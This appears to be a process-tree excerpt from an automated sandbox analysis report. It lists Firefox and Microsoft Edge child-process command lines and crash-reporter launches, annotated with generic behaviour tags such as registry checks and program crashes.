C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.3.1593068820\579170437" -childID 2 -isForBrowser -prefsHandle 3612 -prefMapHandle 3608 -prefsLen 26049 -prefMapSize 232711 -jsInitHandle 1388 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d527f1ff-b44d-4d54-bc4e-4b1f2d5f4ac4} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 3624 16044561958 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.4.362418342\1766350787" -childID 3 -isForBrowser -prefsHandle 4276 -prefMapHandle 4272 -prefsLen 26829 -prefMapSize 232711 -jsInitHandle 1388 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9ca84c4-6744-4219-98ac-c21057110cac} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 4288 1605627c458 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.5.940964755\443202883" -childID 4 -isForBrowser -prefsHandle 5100 -prefMapHandle 5036 -prefsLen 29182 -prefMapSize 232711 -jsInitHandle 1388 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4c6f77b-5e7a-4de5-a301-98f3f4a1a8a3} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5116 16058b6e558 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.6.1499913737\141612203" -childID 5 -isForBrowser -prefsHandle 5180 -prefMapHandle 5104 -prefsLen 29182 -prefMapSize 232711 -jsInitHandle 1388 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a2e8a25-a33e-44ad-9c3f-093bbeb462f1} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5168 16058b6f458 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.7.91974742\537517772" -childID 6 -isForBrowser -prefsHandle 5476 -prefMapHandle 5416 -prefsLen 29357 -prefMapSize 232711 -jsInitHandle 1388 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc36455e-d46a-4d12-a282-f95c478364f1} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5412 1605233d358 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.9.2021175770\1052487856" -childID 8 -isForBrowser -prefsHandle 5628 -prefMapHandle 5624 -prefsLen 29357 -prefMapSize 232711 -jsInitHandle 1388 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ef331e4-3769-4321-b344-d0acb4139238} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5216 160523e2858 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.8.1320382086\1486385154" -childID 7 -isForBrowser -prefsHandle 5616 -prefMapHandle 5476 -prefsLen 29357 -prefMapSize 232711 -jsInitHandle 1388 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b7a4ce9-77b2-4016-912c-30968a5823ac} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5232 16044562558 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3088.10.796110369\165174630" -childID 9 -isForBrowser -prefsHandle 5720 -prefMapHandle 5216 -prefsLen 29357 -prefMapSize 232711 -jsInitHandle 1388 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17015965-80ac-426c-b4cb-788d463c1cce} 3088 "\\.\pipe\gecko-crash-server-pipe.3088" 5708 16051e20858 tab4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3088 -s 53524⤵
- Program crash
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5760.0.1380038369\658268098" -parentBuildID 20221007134813 -prefsHandle 1632 -prefMapHandle 1624 -prefsLen 20890 -prefMapSize 232711 -appDir "C:\Program Files\Mozilla Firefox\browser" - {46a1dcd7-71d0-4b4c-872c-f2c2bfd5c0d9} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" 1768 18f59ddde58 gpu4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5760.1.1811882079\1869191400" -parentBuildID 20221007134813 -prefsHandle 2120 -prefMapHandle 2112 -prefsLen 20890 -prefMapSize 232711 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8e41358-ffa1-4929-b470-18f05cb68711} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" 2132 18f59c40258 socket4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5760.2.1610409110\1794426425" -childID 1 -isForBrowser -prefsHandle 3600 -prefMapHandle 2912 -prefsLen 21327 -prefMapSize 232711 -jsInitHandle 1044 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {74f940ba-a931-4c9e-98b0-c9d163a024b7} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" 3552 18f5e128e58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5760.3.94708308\1735971713" -childID 2 -isForBrowser -prefsHandle 3952 -prefMapHandle 3948 -prefsLen 26049 -prefMapSize 232711 -jsInitHandle 1044 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60438414-4640-41a6-a3e8-bb2abd26b4d4} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" 3964 18f602b4958 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5760.4.367611593\450077267" -childID 3 -isForBrowser -prefsHandle 1004 -prefMapHandle 3208 -prefsLen 26829 -prefMapSize 232711 -jsInitHandle 1044 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2a55328-faae-4153-ba97-4c0014dfebbd} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" 4148 18f4d861658 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5760.6.1181500774\1358124974" -childID 5 -isForBrowser -prefsHandle 4968 -prefMapHandle 5000 -prefsLen 29103 -prefMapSize 232711 -jsInitHandle 1044 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c68a7b71-5fa8-48aa-b068-832470e3362e} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" 5024 18f5d18c058 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5760.5.608114661\1360733572" -childID 4 -isForBrowser -prefsHandle 4952 -prefMapHandle 4964 -prefsLen 29103 -prefMapSize 232711 -jsInitHandle 1044 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5991240-50a4-474b-b580-ea4e2ecc6420} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" 4612 18f4d82f058 tab4⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5760.7.1059210685\1183903657" -childID 6 -isForBrowser -prefsHandle 5024 -prefMapHandle 5340 -prefsLen 29278 -prefMapSize 232711 -jsInitHandle 1044 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {290a7e34-b0a3-474f-86f3-66f7e333d49b} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" 4648 18f5eb85658 tab4⤵
-
C:\Program Files\Mozilla Firefox\crashreporter.exe"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\i5yk3ps6.default-release\minidumps\e6828fd5-bf1f-4a24-ac8e-d42233db32a4.dmp"4⤵
-
C:\Program Files\Mozilla Firefox\minidump-analyzer.exe"C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\i5yk3ps6.default-release\minidumps\e6828fd5-bf1f-4a24-ac8e-d42233db32a4.dmp"5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3316.0.1421823468\69919311" -parentBuildID 20221007134813 -prefsHandle 1656 -prefMapHandle 1648 -prefsLen 20890 -prefMapSize 232711 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b159796-c0da-46b4-91d2-6f71bf0aa34d} 3316 "\\.\pipe\gecko-crash-server-pipe.3316" 1748 25f580f0858 gpu7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3316.1.548306226\645600671" -parentBuildID 20221007134813 -prefsHandle 2108 -prefMapHandle 2104 -prefsLen 20890 -prefMapSize 232711 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a15c38b7-3732-41f7-886a-a8860dbac8e1} 3316 "\\.\pipe\gecko-crash-server-pipe.3316" 2120 25f587aab58 socket7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3316.2.533626282\1709906801" -childID 1 -isForBrowser -prefsHandle 2660 -prefMapHandle 2848 -prefsLen 21327 -prefMapSize 232711 -jsInitHandle 1392 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {45ec847c-4dad-4c6e-8b3c-5b0ae1c0d747} 3316 "\\.\pipe\gecko-crash-server-pipe.3316" 2656 25f5c3c8d58 tab7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3316.3.441688002\965119840" -childID 2 -isForBrowser -prefsHandle 3620 -prefMapHandle 3616 -prefsLen 26049 -prefMapSize 232711 -jsInitHandle 1392 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {db920aa9-3a59-43e2-9627-73884910643f} 3316 "\\.\pipe\gecko-crash-server-pipe.3316" 3628 25f4bb62b58 tab7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3316.4.355637726\115577682" -childID 3 -isForBrowser -prefsHandle 4200 -prefMapHandle 4196 -prefsLen 26888 -prefMapSize 232711 -jsInitHandle 1392 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fac0aa8-113b-464b-bbc5-8cf4a58ceea3} 3316 "\\.\pipe\gecko-crash-server-pipe.3316" 4228 25f5ef20258 tab7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5240 -s 11848⤵
- Program crash
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3316.5.1419533656\299676278" -childID 4 -isForBrowser -prefsHandle 4996 -prefMapHandle 4928 -prefsLen 29103 -prefMapSize 232711 -jsInitHandle 1392 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e350c20c-458b-4d5e-8146-de50b8d097ea} 3316 "\\.\pipe\gecko-crash-server-pipe.3316" 4732 25f5ccca158 tab7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3316.7.1570978349\1744770350" -childID 6 -isForBrowser -prefsHandle 5128 -prefMapHandle 5004 -prefsLen 29103 -prefMapSize 232711 -jsInitHandle 1392 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2a73fc0c-eed9-4e89-bdd5-70dc1952a3c4} 3316 "\\.\pipe\gecko-crash-server-pipe.3316" 5332 25f5deec058 tab7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3316.6.2100297051\889399962" -childID 5 -isForBrowser -prefsHandle 5096 -prefMapHandle 4948 -prefsLen 29103 -prefMapSize 232711 -jsInitHandle 1392 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e28a20ba-12c7-4a8c-aa9f-4fef3183481f} 3316 "\\.\pipe\gecko-crash-server-pipe.3316" 4732 25f5dc49058 tab7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3316 -s 49887⤵
- Program crash
-
C:\Program Files\Mozilla Firefox\crashreporter.exe"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\739d33ee-e76f-47e1-8ae4-1dcd494bdce0.dmp"8⤵
- Modifies registry class
-
C:\Program Files\Mozilla Firefox\minidump-analyzer.exe"C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\739d33ee-e76f-47e1-8ae4-1dcd494bdce0.dmp"9⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5132.0.921495881\1373145248" -parentBuildID 20221007134813 -prefsHandle 1676 -prefMapHandle 1668 -prefsLen 20890 -prefMapSize 232711 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0f81750-f6f4-434e-86d1-893de0d7b517} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" 1756 162dc4f0d58 gpu4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5132.1.186756531\705960871" -parentBuildID 20221007134813 -prefsHandle 2092 -prefMapHandle 2088 -prefsLen 20890 -prefMapSize 232711 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {347db818-a0e7-4a5e-90bf-adab0b0b4b07} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" 2124 162dcba6b58 socket4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5132.2.332737810\456663620" -childID 1 -isForBrowser -prefsHandle 2856 -prefMapHandle 3160 -prefsLen 21327 -prefMapSize 232711 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6dffdde7-272b-4617-a12c-f5c8180b281a} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" 3112 162e08e4f58 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5132.4.1679232916\614802224" -childID 3 -isForBrowser -prefsHandle 4028 -prefMapHandle 4024 -prefsLen 26888 -prefMapSize 232711 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d36cde59-1ca2-43f3-a462-6df9a21da21f} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" 4040 162e25f9558 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5132.3.1997933145\565794822" -childID 2 -isForBrowser -prefsHandle 3852 -prefMapHandle 3848 -prefsLen 26829 -prefMapSize 232711 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64390771-1775-40cc-954c-17c3423918e4} 5132 "\\.\pipe\gecko-crash-server-pipe.5132" 3864 162e25f8358 tab4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5132 -s 50804⤵
- Program crash
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffb60b446f8,0x7ffb60b44708,0x7ffb60b447183⤵
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 /prefetch:33⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2764 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2760 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3892 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3892 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3944 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3772 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5624 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4824 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:13⤵
-
